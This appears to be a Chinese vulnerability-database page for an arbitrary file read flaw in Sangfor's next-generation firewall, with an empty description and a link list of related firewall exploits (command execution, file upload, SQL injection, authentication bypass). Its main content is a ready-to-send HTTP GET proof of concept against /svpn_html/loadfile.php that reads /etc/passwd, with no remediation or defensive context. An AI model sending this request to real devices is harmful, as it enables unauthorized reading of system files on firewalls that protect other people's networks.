深信服下一代防火墙 /svpn_html/loadfile.php 任意文件读取漏洞

漏洞描述

PoC代码

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Y-Forwarded-For: [REDACTED]

相关漏洞推荐

• POC h3c-secpath-firewall-file-read: H3C SecPath下一代防火墙 sys_dia_data_check 任意文件下载漏洞
• POC netentsec-fiewall-heartbeat-php-rce: 网康 下一代防火墙 HeartBeat.php 远程命令执行
• POC netpower-download-php-file-read: 中科网威 下一代防火墙控制系统 download.php 任意文件读取漏洞
• POC sangfor-ngaf-login-rce: 深信服下一代防火墙NGAF login远程命令执行漏洞
• 中科网威下一代防火墙弱口令漏洞
• 中科网威下一代防火墙控制系统 download.php 任意文件下载漏洞
• POC 多个厂商OEM下一代防火墙 log_fw_ips_scan_jsondata SQL注入漏洞
• 六方云下一代防火墙弱口令漏洞
• 中科网威下一代防火墙控制系统 /view/DBManage/Backup_Server_commit.php 命令执行漏洞
• H3C 下一代防火墙 local_cert_delete_both 存在任意文件上传漏洞
• 深信服下一代防火墙 CVE-2023-30803 身份认证绕过漏洞
• 深信服下一代防火墙敏感信息泄露漏洞
• 绿盟下一代防火墙文件上传漏洞